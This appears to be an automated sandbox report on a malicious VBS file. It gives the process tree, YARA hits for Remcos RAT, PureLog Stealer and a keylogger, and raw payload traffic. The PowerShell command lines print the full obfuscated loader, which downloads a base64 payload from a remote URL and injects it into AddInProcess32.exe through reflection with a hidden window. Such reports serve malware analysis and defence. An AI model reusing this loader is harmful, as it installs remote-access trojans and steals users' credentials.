                              2024-10-02 03:29:49 UTC1369INData Raw: 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77 67 4a 4d 51 43 44 69 77 41 49 4d 34 42 44 63 77 67 47 4d 67 42 44 57 77 41 46 4d 49 42 44 51 77 67 44 4d 77 41 44 4b 77 41 43 4d 59 41 44 45 77 67 41 4d 41 41 41 41 42 41 49 41 46 41 4c 41 2f 67 2f 50 77 2f 44 36 2f 41 2b 50 59 2f 44 30 2f 67 38 50 41 2f 44 75 2f 41 37 50 6f 2b 44 6f 2f 67 35 50 51 2b 44 69 2f 41 34 50 34 39 44 63 2f 67 32 50 67 39 44 57 2f 41 31 50 49 39 44 51 2f 67 7a 50 77 38 44 4b 2f 41 79 50 59 38 44 45 2f 67 77 50 41 34 44 2b 2b 41 76 50 6f 37 44 34 2b 67 74 50 51 37 44 79 2b 41 73 50 34 36 44 74 2b 77 71 50 6b 36 44 6e 2b 51 70 50 4d 36 44 68 2b 77 6e 50 30 35 44 62 2b 51 6d 50 63 35 44 56 2b 77 6b 50 45 35 44 50 2b 51 6a 50 73 34 44 4a 2b 77 68 50 55 34 44 44 2b 51 51 50 38 33 44 39 39 77 65
                              Data Ascii: ADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBDWwAFMIBDQwgDMwADKwACMYADEwgAMAAAABAIAFALA/g/Pw/D6/A+PY/D0/g8PA/Du/A7Po+Do/g5PQ+Di/A4P49Dc/g2Pg9DW/A1PI9DQ/gzPw8DK/AyPY8DE/gwPA4D++AvPo7D4+gtPQ7Dy+AsP46Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99we
                              2024-10-02 03:29:49 UTC1369INData Raw: 56 44 64 31 41 58 4e 73 56 44 61 31 51 57 4e 67 56 44 58 31 67 56 4e 55 56 44 55 31 77 55 4e 49 56 44 52 31 41 55 4e 38 55 44 4f 31 51 54 4e 77 55 44 4c 31 67 53 4e 6b 55 44 49 31 77 52 4e 59 55 44 46 31 41 52 4e 4d 55 44 43 31 41 41 41 41 45 41 62 41 55 41 6b 41 45 44 37 78 49 65 4d 59 48 6a 7a 78 51 63 4d 36 47 44 73 78 59 61 4d 63 47 6a 6b 78 67 59 4d 2b 46 44 64 78 6f 57 4d 67 46 6a 56 78 77 55 4d 43 46 44 4f 78 34 53 4d 6b 45 6a 47 78 41 52 4d 47 41 44 2f 77 49 50 4d 6a 44 54 32 77 38 4d 4d 46 44 7a 75 77 45 4c 4d 6e 43 54 6e 77 4d 4a 4d 4a 43 7a 66 77 55 48 4d 72 42 54 59 77 63 46 4d 44 42 54 4f 77 38 43 4d 6c 41 54 47 77 34 41 4d 45 41 41 41 41 67 47 41 46 41 49 41 41 41 77 50 36 2f 44 38 2f 59 2b 50 63 2f 6a 30 2f 67 38 50 2b 2b 6a 73 2f 63 36 50
                              Data Ascii: VDd1AXNsVDa1QWNgVDX1gVNUVDU1wUNIVDR1AUN8UDO1QTNwUDL1gSNkUDI1wRNYUDF1ARNMUDC1AAAAEAbAUAkAED7xIeMYHjzxQcM6GDsxYaMcGjkxgYM+FDdxoWMgFjVxwUMCFDOx4SMkEjGxARMGAD/wIPMjDT2w8MMFDzuwELMnCTnwMJMJCzfwUHMrBTYwcFMDBTOw8CMlATGw4AMEAAAAgGAFAIAAAwP6/D8/Y+Pc/j0/g8P++js/c6P
                              2024-10-02 03:29:49 UTC1059INData Raw: 44 2b 30 77 4f 4e 6a 53 7a 59 30 41 46 4e 75 51 44 43 7a 55 2b 4d 63 4f 7a 6c 7a 45 35 4d 4d 4f 6a 57 7a 38 67 4d 6f 4c 44 74 79 49 69 4d 50 45 54 32 78 49 61 4d 74 46 44 5a 78 59 56 4d 42 46 54 45 77 6f 50 4d 76 44 7a 32 77 41 4e 4d 4c 44 6a 71 77 30 48 41 41 41 41 73 41 51 41 38 41 34 7a 61 2b 41 6c 50 59 30 44 77 39 41 62 50 6d 32 54 6d 39 38 59 50 41 32 6a 5a 39 38 56 50 59 31 54 55 39 34 52 50 4a 30 44 42 38 4d 50 50 70 7a 7a 79 38 38 4b 50 64 79 7a 69 38 77 48 50 43 6f 54 2b 36 49 74 4f 6e 70 44 51 35 73 70 4e 53 62 7a 73 32 55 55 4e 71 58 54 69 30 30 4c 4e 77 53 44 71 30 73 33 4d 46 4e 6a 41 79 45 75 4d 5a 4c 54 77 79 30 61 4d 67 48 54 73 78 45 45 4d 32 44 6a 37 77 49 48 4d 72 42 7a 4b 41 41 41 41 77 42 41 42 67 44 41 41 41 38 44 7a 2f 38 35 50 63
                              Data Ascii: D+0wONjSzY0AFNuQDCzU+McOzlzE5MMOjWz8gMoLDtyIiMPET2xIaMtFDZxYVMBFTEwoPMvDz2wANMLDjqw0HAAAAsAQA8A4za+AlPY0Dw9AbPm2Tm98YPA2jZ98VPY1TU94RPJ0DB8MPPpzzy88KPdyzi8wHPCoT+6ItOnpDQ5spNSbzs2UUNqXTi00LNwSDq0s3MFNjAyEuMZLTwy0aMgHTsxEEM2Dj7wIHMrBzKAAAAwBABgDAAA8Dz/85Pc
                              2024-10-02 03:29:49 UTC1369INData Raw: 33 66 66 61 0d 0a 61 78 41 57 4d 38 45 44 4e 77 55 50 4d 74 44 44 72 77 45 4b 4d 4f 42 44 53 41 41 41 41 67 43 41 42 51 43 77 50 68 2f 54 32 2f 73 38 50 44 2f 6a 75 2f 45 37 50 70 2b 54 6f 2f 6b 35 50 4f 2b 44 66 2f 51 33 50 6f 39 44 59 2f 63 31 50 4f 39 6a 52 2f 34 7a 50 32 38 6a 4c 2f 45 79 50 56 38 54 44 2b 38 73 50 6a 36 7a 64 2b 41 6c 50 4b 35 44 52 2b 34 6a 50 32 34 6a 4d 2b 63 69 50 59 34 44 44 39 73 66 50 76 33 54 33 39 6b 62 50 71 32 44 6e 39 6f 58 50 31 31 44 63 39 77 56 50 52 31 44 50 39 38 53 50 6b 77 54 39 38 63 4e 50 53 7a 54 7a 38 49 4d 50 6d 79 6a 67 38 38 45 50 4b 78 54 52 38 6f 44 50 4a 73 54 35 37 41 2b 4f 62 76 44 30 37 51 37 4f 64 75 6a 67 37 30 33 4f 34 74 54 62 37 45 31 4f 42 74 44 49 37 73 78 4f 57 73 7a 43 36 6b 75 4f 58 72 54 75
                              Data Ascii: 3ffaaxAWM8EDNwUPMtDDrwEKMOBDSAAAAgCABQCwPh/T2/s8PD/ju/E7Pp+To/k5PO+Df/Q3Po9DY/c1PO9jR/4zP28jL/EyPV8TD+8sPj6zd+AlPK5DR+4jP24jM+ciPY4DD9sfPv3T39kbPq2Dn9oXP11Dc9wVPR1DP98SPkwT98cNPSzTz8IMPmyjg88EPKxTR8oDPJsT57A+ObvD07Q7Odujg703O4tTb7E1OBtDI7sxOWszC6kuOXrTu
                              2024-10-02 03:29:49 UTC1369INData Raw: 71 4e 69 55 44 32 31 4d 63 4e 70 56 6a 46 30 6b 77 4d 72 4d 44 43 79 67 64 4d 48 44 41 41 41 77 45 41 45 41 43 41 37 4d 47 4f 56 63 44 2b 33 59 36 4e 41 5a 44 4b 31 73 57 4e 79 55 44 44 30 41 39 4d 7a 50 54 41 79 41 74 4d 79 45 54 37 78 6f 62 4d 6f 46 7a 4f 78 34 41 4d 63 42 41 41 41 41 44 41 45 41 42 41 41 41 77 50 6e 2b 7a 64 2b 6b 53 50 69 33 7a 68 39 6b 33 4f 42 70 54 64 35 6b 45 4f 35 69 7a 6b 34 59 33 4e 45 61 6a 6e 32 63 6a 4e 6b 55 54 38 31 45 38 4d 6e 49 6a 35 79 55 73 4d 68 4b 6a 6d 79 55 70 4d 6c 45 54 61 77 6f 4a 41 41 41 41 51 41 51 41 41 41 38 6a 35 2f 45 2b 50 43 37 6a 78 2b 55 71 50 42 36 6a 65 2b 55 6e 50 49 30 44 48 38 77 65 4f 51 6d 6a 68 7a 63 67 4d 67 46 44 4d 78 6f 41 4d 74 44 7a 4e 77 73 42 41 41 41 41 4d 41 4d 41 38 41 41 41 41 2f
                              Data Ascii: qNiUD21McNpVjF0kwMrMDCygdMHDAAAwEAEACA7MGOVcD+3Y6NAZDK1sWNyUDD0A9MzPTAyAtMyET7xobMoFzOx4AMcBAAAADAEABAAAwPn+zd+kSPi3zh9k3OBpTd5kEO5izk4Y3NEajn2cjNkUT81E8MnIj5yUsMhKjmyUpMlETawoJAAAAQAQAAA8j5/E+PC7jx+UqPB6je+UnPI0DH8weOQmjhzcgMgFDMxoAMtDzNwsBAAAAMAMA8AAAA/
                              2024-10-02 03:29:49 UTC1369INData Raw: 4d 48 44 54 77 77 77 4c 4d 32 43 44 73 77 6f 4b 4d 6c 43 7a 6e 77 6b 4a 4d 54 43 6a 6a 77 67 49 4d 43 43 44 66 77 63 48 4d 78 42 7a 61 77 55 47 4d 67 42 6a 57 77 4d 46 4d 4f 42 54 53 77 4d 45 4d 39 41 7a 4e 77 49 44 4d 73 41 6a 4a 77 41 43 4d 62 41 54 46 77 38 41 4d 4a 41 44 42 41 41 51 41 49 42 77 41 67 42 41 41 41 38 6a 2f 2f 67 2f 50 79 2f 54 37 2f 63 2b 50 68 2f 7a 32 2f 59 39 50 51 2f 6a 79 2f 51 38 50 2f 2b 54 75 2f 4d 37 50 74 2b 44 71 2f 49 36 50 63 2b 6a 6c 2f 45 35 50 4c 2b 54 68 2f 38 33 50 36 39 44 64 2f 34 32 50 6f 39 7a 59 2f 30 31 50 58 39 54 55 2f 77 30 50 47 39 44 51 2f 6f 7a 50 31 38 7a 4c 2f 6b 79 50 6a 38 6a 48 2f 67 78 50 53 38 44 44 2f 63 77 50 42 34 6a 2b 2b 4d 76 50 74 37 44 69 39 45 61 50 56 77 54 30 38 51 4d 50 39 79 7a 74 38 45
                              Data Ascii: MHDTwwwLM2CDswoKMlCznwkJMTCjjwgIMCCDfwcHMxBzawUGMgBjWwMFMOBTSwMEM9AzNwIDMsAjJwACMbATFw8AMJADBAAQAIBwAgBAAA8j//g/Py/T7/c+Ph/z2/Y9PQ/jy/Q8P/+Tu/M7Pt+Dq/I6Pc+jl/E5PL+Th/83P69Dd/42Po9zY/01PX9TU/w0PG9DQ/ozP18zL/kyPj8jH/gxPS8DD/cwPB4j++MvPt7Di9EaPVwT08QMP9yzt8E


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:23:29:37
                              Start date:01/10/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"
                              Imagebase:0x7ff7b6780000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:23:29:38
                              Start date:01/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                              Imagebase:0x7ff6eb350000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:23:29:38
                              Start date:01/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68cce0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:6
                              Start time:23:29:39
                              Start date:01/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                              Imagebase:0x7ff6eb350000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1392660414.00000208F3A4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:23:29:48
                              Start date:01/10/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              Imagebase:0x4e0000
                              File size:43'008 bytes
                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Disassembly

                              Reset < >

                                Executed Functions

                                Function 00007FFE7E4337B5 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.1443348125.00007FFE7E430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E430000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffe7e430000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                • Instruction ID: c17a4acc6a2d906f2723dda7991aa3987b95378c92996e60fc9e1d7602b410ac
                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                • Instruction Fuzzy Hash: 7901677111CB0D4FD748EF0CE451AAAB7E0FB95364F10056EE59AC3661D736E882CB45

                                Executed Functions

                                Function 00007FFE7E52358E Relevance: 2.2, Instructions: 2195COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.1421264594.00007FFE7E520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_7ffe7e520000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16f21f843582c61615f8b05dd86aaa6cf2fc6b29a3d9b357dd95a522c8b77b94
                                • Instruction ID: ec9fe6539944bd478fb73f33a627bf71890c4e840907dc0b683f71ca06b586bc
                                • Opcode Fuzzy Hash: 16f21f843582c61615f8b05dd86aaa6cf2fc6b29a3d9b357dd95a522c8b77b94
                                • Instruction Fuzzy Hash: A6037C3020CB888FDFA9EB18C454E56B7E1EFAA704F15458E948DCB291DF31AC85CB56
                                Function 00007FFE7E5235BA Relevance: 2.2, Instructions: 2193COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.1421264594.00007FFE7E520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_7ffe7e520000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb78f638edcce446469f6d0ad685055dc889a2dcee859ee564e8b9ca0e4940f4
                                • Instruction ID: 89cade9ce7ed1fb60315147454d92575ae0b0a40e27fc23ba2c50f55febbbcea
                                • Opcode Fuzzy Hash: eb78f638edcce446469f6d0ad685055dc889a2dcee859ee564e8b9ca0e4940f4
                                • Instruction Fuzzy Hash: 89037C3020CB888FDFA9EB18C454E96B7E1EFAA704F15458E948DC7291DF31AC85CB56
                                Function 00007FFE7E4540B5 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.1420707169.00007FFE7E450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_7ffe7e450000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 07d101c740cf37a515efd06493a5613819389bae709fa9f1c1a1a4764a895255
                                • Instruction ID: eaaaa82acb523714175243ae81bad9b70bfecd868edaa51347b51ee45bceb240
                                • Opcode Fuzzy Hash: 07d101c740cf37a515efd06493a5613819389bae709fa9f1c1a1a4764a895255
                                • Instruction Fuzzy Hash: 1201677111CB0D8FD748EF0CE451AA9B7E0FB95364F10056EE58AC3661D636E882CB45
                                Function 00007FFE7E527263 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.1421264594.00007FFE7E520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_7ffe7e520000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 51e716cb12415d48ac90fe640963569d9b3b7809caf0f21d32ceb2000f160f4f
                                • Instruction ID: 0ecb56268d54a19ea6426db5caa13aa3da4adf0b3e6ecdabfebffcfa3da1adb7
                                • Opcode Fuzzy Hash: 51e716cb12415d48ac90fe640963569d9b3b7809caf0f21d32ceb2000f160f4f
                                • Instruction Fuzzy Hash: EFF05422F29D1E0FA7D9E25C50653B992D3EBCC271B98417AD45DC32AADD19EC010244
                                Function 00007FFE7E52049A Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.1421264594.00007FFE7E520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_7ffe7e520000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9d5ab82209e5053c6b86fb38dd3df8f57db94e526d1968645064a115e34aec6d
                                • Instruction ID: 54a933f85911802aff08cbbc241bdb7d850e01e19bf6ec8e30d658848748dadf
                                • Opcode Fuzzy Hash: 9d5ab82209e5053c6b86fb38dd3df8f57db94e526d1968645064a115e34aec6d
                                • Instruction Fuzzy Hash: 6BE0C233F0A82C0FA651518C641A2F9F291FB482747454273C86EE3124C919AC1203C0
                                Function 00007FFE7E5272AA Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.1421264594.00007FFE7E520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_7ffe7e520000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 64d89198351b002a44d5268368f52906f6e9b994ca43f6e7ab303232142ccb17
                                • Instruction ID: b18bc62d1c50ea50f57f0777186cb22788240fbd3ceb27c0d935bb1354ad37d2
                                • Opcode Fuzzy Hash: 64d89198351b002a44d5268368f52906f6e9b994ca43f6e7ab303232142ccb17
                                • Instruction Fuzzy Hash: E7D01732A24E0E4AE3D6A6284028235A1D3AFC86127A44479D42DC66AAED39EC424304
                                Function 00007FFE7E5204D2 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.1421264594.00007FFE7E520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_7ffe7e520000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb47012c0cdcaf3708ffac3ef20edf88d4aee919f7dc28b453f4a7122532eedf
                                • Instruction ID: 1c89acbe589f3bf2a0e47695c92e80aecc32dea5cea2d9ae4e2e2ac61be26b84
                                • Opcode Fuzzy Hash: cb47012c0cdcaf3708ffac3ef20edf88d4aee919f7dc28b453f4a7122532eedf
                                • Instruction Fuzzy Hash: 48C08012F5ED1E0E6195517C203D37D43C2EB9C5703554277581EC7355DC14DC030341